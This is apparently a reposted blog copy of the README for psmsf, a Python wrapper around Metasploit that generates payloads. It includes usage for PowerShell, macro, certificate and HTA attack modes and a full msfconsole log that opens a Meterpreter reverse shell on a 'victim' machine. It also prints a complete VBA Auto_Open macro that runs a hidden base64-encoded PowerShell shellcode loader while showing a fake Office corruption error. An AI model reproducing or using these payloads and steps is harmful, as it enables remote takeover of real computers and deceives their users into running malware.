Pentest - psmsf
来源:互联网 发布:js 设置控件不可用 编辑:程序博客网 时间:2024/04/30 09:43
PSMSF
PSMSF can help us generate payload or files used in cmd console/browser/.. with Metasploit-Framework. If you are similar to windows cmd console, you can use the results in different areas.
psmsf [master●] python psmsf.py -hUsage: python psmsf.py [options]Options: -h, --help show this help message and exit --attacktype=ATTACKTYPE Attack Types are supported. (ps, crt, hta, mac) Powershell/Macro Attack: Generate metasploit console script / macro --payload=PAYLOAD payload of metasploit framework --lhost=LHOST lhost for payload of metasploit framework --lport=LPORT lport for payload of metasploit framework CERT Attack: Translate a binary file into a text certification file, and restore the cert file to a binary file on target machines --filename=FILENAME file to be encoded to a certification HTA Attack: Generate HTA html page. When victims access HTA page, os will be attacked from Internet Explorer --command=COMMAND command of attack mode
Requirement
If you use Kali Linux, Install Metasploit-Framework with the command:
$ sudo apt-get install metasploit-framework
Usage
psmsf has three attack types,
- [x] powershell attack
- [x] cert attack
- [x] hta attack
Powershell Attack Mode
psmsf [master●] python psmsf.py --attacktype ps[+] ###### # # #### # # #### ###### # # # ## ## # # ###### #### # ## # #### ##### # # # # # # # # # # # # # # # #### # # #### #[+] Everything is now generated in two files, ex: powershell_hacking.bat - shellcode can be executed in cmd console. - Usage: cmd.exe /c powershell_hacking.bat powershell_msf.rc - msfconsole resource script. - Usage: msfconsole -r powershell_msf.rc[+] python psmsf.py --attacktype ps --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443[+] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443[+] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443
Everything is now generated in two files,
psmsf [master●] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.101 --lport 8443[+] create msfconsole resource script[+] create powershell shellcode command
Victim
Please put the file powershell_hacking.bat to the victim’s machine, and execute the shellcode with command.
cmd.exe /c powershell_hacking.bat
Attacker
Starts a metasploit-framework listeners,
psmsf [master●] msfconsole -r powershell_msf.rc# cowsay++ ____________< metasploit > ------------ \ ,__, \ (oo)____ (__) )\ ||--|| * =[ metasploit v4.11.11-dev-95484c8 ]+ -- --=[ 1521 exploits - 884 auxiliary - 259 post ]+ -- --=[ 437 payloads - 38 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ][*] Processing powershell_msf.rc for ERB directives.resource (powershell_msf.rc)> use exploit/multi/handlerresource (powershell_msf.rc)> set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpresource (powershell_msf.rc)> set LHOST 192.168.1.101LHOST => 192.168.1.101resource (powershell_msf.rc)> set LPORT 8443LPORT => 8443resource (powershell_msf.rc)> set ExitOnSession falseExitOnSession => falseresource (powershell_msf.rc)> set EnableStageEncoding trueEnableStageEncoding => trueresource (powershell_msf.rc)> exploit -j[*] Exploit running as background job.[*] Started reverse TCP handler on 192.168.1.101:8443[*] Starting the payload handler...msf exploit(handler) >
If you run powershell_hacking.bat on victim’s machine, a new session will be created:
msf exploit(handler) > jobsJobs==== Id Name Payload LPORT -- ---- ------- ----- 0 Exploit: multi/handler windows/meterpreter/reverse_tcp 8443msf exploit(handler) >[*] Encoded stage with x86/shikata_ga_nai[*] Sending encoded stage (958029 bytes) to 192.168.1.101[*] Meterpreter session 1 opened (192.168.1.101:8443 -> 192.168.1.101:64656) at 2016-02-20 17:46:01 +0800msf exploit(handler) > sessions -i 1[*] Starting interaction with 1...meterpreter > sysinfoComputer : SECOS : Windows 7 (Build 7600).
Macro Attack Mode
Create a macro VBA for shellcode executation.
root@lab:/usr/share/psmsf# python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_https --lhost 192.168.1.101 --lport 8443[+] create msfconsole resource script[+] create powershell shellcode command[+]Sub Auto_Open()Dim xx = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBhACwAMAB4ADEAYgAsADAAeAAxADEALAAwAHgAZgA0ACwAMAB4AGYANwAsADAAeABkADkALAAwAHgAYwAxACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQA3ACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGYAMwAsADAAeAAwADEALAAwAHgAMABiACwAMAB4AGMAMgAsADAAeAA3ADEALAAwAHgAZQA5ACwAMAB4AGYANAAsADAAeAAxADIALAAwAHgAMQA2ACwAMAB4ADYAMwAsADAAeAAxADEALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeAAxADcALAAwAHgANQAxACwAMAB4ADEAMwAsADAAeABhADYALAAwAHgANQAzACwAMAB4ADMANwAsADAAeAA5AGYALAAwAHgANABkACwAMAB4ADMAMQAsADAAeABhAGMALAAwAHgAMQA0ACwAMAB4ADIAMwAsADAAeAA5AGUALAAwAHgAYwAzACwAMAB4ADkAZAAsADAAeAA4AGUALAAwAHgAZgA4ACwAMAB4AGUAYQAsADAAeAAxAGUALAAwAHgAYQAyACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAOQBjACwAMAB4AGIAOQAsADAAeAA2AGQALAAwAHgANABlACwAMAB4ADkAZAAsADAAeAA3ADEALAAwAHgANgAwACwAMAB4ADgAZgAsADAAeABkAGEALAAwAHgANgBjACwAMAB4ADgAOQAsADAAeABkAGQALAAwAHgAYgAzACwAMAB4AGYAYgAsADAAeAAzAGMALAAwAHgAZgAyACwAMAB4AGIAMAAsADAAeABiADYALAAwAHgAZgBjACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgANQA3ACwAMAB4ADgANQAsADAAeAA5AGUALAAwAHgANQBhACwAMAB4ADUAOQAsADAAeABhADQALAAwAHgAMwAwACwAMAB4AGQAMQAsADAAeAAwADAALAAwAHgANgA2ACwAMAB4AGIAMgAsADAAeAAzADYALAAwAHgAMwA5ACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgANQBiACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANAA3ACwAMAB4AGEAZgAsADAAeABmADIALAAwAHgAZgA4ACwAMAB4ADgAMQAsADAAeABmAGUALAAwAHgAZgBiACwAMAB4ADUANwAsADAAeABlAGMALAAwAHgAYwBmACwAMAB4ADAAOQAsADAAeABhADkALAAwAHgAMgA4ACwAMAB4AGYANwAsADAAeABmADEALAAwAHgAZABjACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAOABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANwA3ACwAMAB4ADQAYgAsADAAeAA2ADIALAAwAHgAMABkACwAMAB4AGQAZgAsADAAeAAxADgALAAwAHgAZAA0ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADgAMwAsADAAeAA3AGEALAAwAHgAZQBjACwAMAB4AGIAYQAsADAAeABjADAALAAwAHgAMgA1ACwAMAB4AGYAMAAsADAAeAAzAGQALAAwAHgAMAA0ACwAMAB4ADUAZQAsADAAeAAwAGMALAAwAHgAYgA1ACwAMAB4AGEAYgAsADAAeABiADEALAAwAHgAOAA1ACwAMAB4ADgAZAAsADAAeAA4AGYALAAwAHgAMQA1ACwAMAB4AGMAZQAsADAAeAA1ADYALAAwAHgAYgAxACwAMAB4ADAAYwAsADAAeABhAGEALAAwAHgAMwA5ACwAMAB4AGMAZQAsADAAeAA0AGYALAAwAHgAMQA1ACwAMAB4AGUANQAsADAAeAA2AGEALAAwAHgAMQBiACwAMAB4AGIAYgAsADAAeABmADIALAAwAHgAMAA2ACwAMAB4ADQANgAsADAAeABkADMALAAwAHgANgBhACwAMAB4ADcAYwAsADAAeAAwAGQALAAwAHgAMgAzACwAMAB4ADEAYgAsADAAeAAwADkALAAwAHgAOAA0ACwAMAB4ADQAZAAsADAAeABiADIALAAwAHgAYQAxACwAMAB4ADMAZQAsADAAeABkAGQALAAwAHgAMwAzACwAMAB4ADYAYwAsADAAeABiADgALAAwAHgAMgAyACwAMAB4ADYAZQAsADAAeAA0ADEALAAwAHgAMQBkACwAMAB4ADgAZgAsADAAeABjADIALAAwAHgAZgAxACwAMAB4AGYAMgAsADAAeAA3AGMALAAwAHgAOABkACwAMAB4AGMAZgAsADAAeABhADIALAAwAHgAZgBiACwAMAB4AGUAYQAsADAAeABjAGYALAAwAHgAOQBlACwAMAB4AGEAOAAsADAAeABhADcALAAwAHgANAA1ACwAMAB4ADIAMgAsADAAeAAxAGQALAAwAHgAMQBiACwAMAB4AGYAMgAsADAAeABkAGYALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAAwADIALAAwAHgAYwA4ACwAMAB4ADQAZAAsADAAeAA5AGIALAAwAHgAMAAyACwAMAB4ADAAOAAsADAAeAA2ADIALAAwAHgAYQBlACwAMAB4ADQAMAAsADAAeAAzAGIALAAwAHgAMQAzACwAMAB4ADgAOAAsADAAeAA0ADQALAAwAHgANgBiACwAMAB4ADgAMwAsADAAeAA0ADMALAAwAHgAYwBjACwAMAB4ADEANAAsADAAeAA5ADUALAAwAHgAOQAzACwAMAB4ADEAYgAsADAAeABhADMALAAwAHgAZABmACwAMAB4ADMAZgAsADAAeABjAGMALAAwAHgAYgA0ACwAMAB4AGUAZAAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4AGUANgAsADAAeAA0ADIALAAwAHgAZgAzACwAMAB4AGMANgAsADAAeAA1AGIALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAAwADMALAAwAHgAMABlACwAMAB4ADkANAAsADAAeAA2ADAALAAwAHgAMgBiACwAMAB4ADYANAAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4AGQAOQAsADAAeABkADgALAAwAHgAMQA2ACwAMAB4ADgAMQAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGUANgAsADAAeAAwADgALAAwAHgAZgAxACwAMAB4ADgAZAAsADAAeABlADIALAAwAHgANQBhACwAMAB4ADkAOAAsADAAeAA0AGUALAAwAHgAYgBjACwAMAB4ADMAMgAsADAAeAAyADkALAAwAHgAMwA3ACwAMAB4AGQAZQAsADAAeAA0ADUALAAwAHgAMgBlACwAMAB4ADYAMgAsADAAeAA4AGQALAAwAHgAMQBhACwAMAB4ADgAMgAsADAAeABkAGUALAAwAHgANgA3ACwAMAB4AGYANQAsADAAeAAwADkALAAwAHgAZQA3ACwAMAB4ADkAZgAsADAAeAA3AGUALAAwAHgAYQBkACwAMAB4ADMAMgAsADAAeAAxAGEALAAwAHgANAAwACwAMAB4ADIANAAsADAAeABiADcALAAwAHgANgBiACwAMAB4ADMANAAsADAAeAAxAGUALAAwAHgAYQBmACwAMAB4ADgAMwAsADAAeAAwADMALAAwAHgAMAAyACwAMAB4ADYANgAsADAAeAA5AGMALAAwAHgAYgA5ACwAMAB4ADIAOQAsADAAeABjADcALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeABiAGUALAAwAHgAYwA3ACwAMAB4AGMAYQAsADAAeAAyAGEALAAwAHgAYgBlACwAMAB4AGMANwAsADAAeAA4AGEALAAwAHgAYQBhACwAMAB4AGUAZAAsADAAeABhAGYALAAwAHgANQAyACwAMAB4ADAAZgAsADAAeAA0ADIALAAwAHgAZAA1ACwAMAB4ADkAZAAsADAAeAA5AGEALAAwAHgAZgA2ACwAMAB4ADQANgAsADAAeAAzADIALAAwAHgAYQBjACwAMAB4ADEAZQAsADAAeAAzAGYALAAwAHgAZABjACwAMAB4AGEAZQAsADAAeABjADAALAAwAHgAYwAwACwAMAB4ADEAYwAsADAAeABmAGMALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAwAGUALAAwAHgAOQA0ACwAMAB4AGQAZQAsADAAeABjAGIALAAwAHgAZAAxACwAMAB4ADQAZAAsADAAeAA2ADUALAAwAHgAYwBiACwAMAB4ADUAOQAsADAAeABhADMALAAwAHgAZQBkACwAMAB4AGMAYgAsADAAeABhADAALAAwAHgAZgA4ACwAMAB4ADcANwAsADAAeAAxADMALAAwAHgAZAA3ACwAMAB4ADEAYgAsADAAeAAyAGYALAAwAHgANQA3ACwAMAB4ADQAOAAsADAAeAAwAGMALAAwAHgAYQA1ACwAMAB4AGEAOAAsADAAeAA4ADkALAAwAHgAMwAzACwAMAB4ADcANwAsADAAeAA2AGUALAAwAHgANAA3ACwAMAB4AGUAMgAsADAAeAA0ADkALAAwAHgAYQA2ACwAMAB4ADkAZgAsADAAeABkADQALAAwAHgAOQA4ACwAMAB4AGUAOAAsADAAeABlAGUALAAwAHgAMQA4ACwAMAB4AGUAYQAsADAAeABmADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAxACkAKQA7ACQAMgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkADMAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAMwAgACQAMgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAAyACAAJABlACIAOwB9AA=="Shell ("POWERSHELL.EXE " & x)Dim title As Stringtitle = "Critical Microsoft Office Error"Dim msg As StringDim intResponse As Integermsg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."intResponse = MsgBox(msg, 16, title)Application.QuitEnd Sub
Cert Attack Mode
You can translate a binary file to a certificate file which is a text file.
psmsf [master●] python psmsf.py --attacktype crt --filename demo.exepsmsf [master●] ll cert_attacktotal 48-rw-r--r-- 1 Open-Security staff 44B Feb 20 21:31 cert_decode.bat-rw-r--r-- 1 Open-Security staff 17K Feb 20 21:31 cert_encode.crt
Upload cert_encode.crt to victim machine, and restore it with windows batch script - cert_decode.bat.
HTA Attack Mode
Create windows hta web page, and you can access http://demo.com/index.html with Internet Explorer Browser.
psmsf [master●] python psmsf.py --attacktype hta --command whoami [+] create hta index file[+] create hta module filepsmsf [master●] ll windows_hta_attacktotal 16-rw-r--r-- 1 Open-Security staff 151B Feb 20 21:37 index.html-rw-r--r-- 1 Open-Security staff 122B Feb 20 21:37 module.hta
References
https://github.com/trustedsec/unicorn
License: BSD License
- Pentest - psmsf
- Pentest - Tools
- sap pentest
- axis2 pentest
- Armitage pentest
- jboss pentest
- informix pentest
- pentest 报告
- SSRF pentest
- pentest blog
- Pentest - Mimikatz
- Pentest - PowerSploit
- Pentest - routersploit
- 金东 pentest
- cvte pentest
- zx pentest
- tx pentest
- HND pentest
- poj 3624 Charm Bracelet
- ThreadLocal 和神奇的 0x61c88647
- .NET Task的新认识
- 数据库常考笔试题
- 626B-Cards
- Pentest - psmsf
- neuq oj 1050: 谭浩强C语言(第三版)习题6.6 C++
- nyist 49 开心的小明(01背包)
- web学习博客2016/2/20
- python的邮箱正则的一些改进
- String、StringBuffer与StringBuilder之间区别
- 好气,action死活取不到input中的值
- .Net中访问数据库学习笔记
- Linux常用命令大全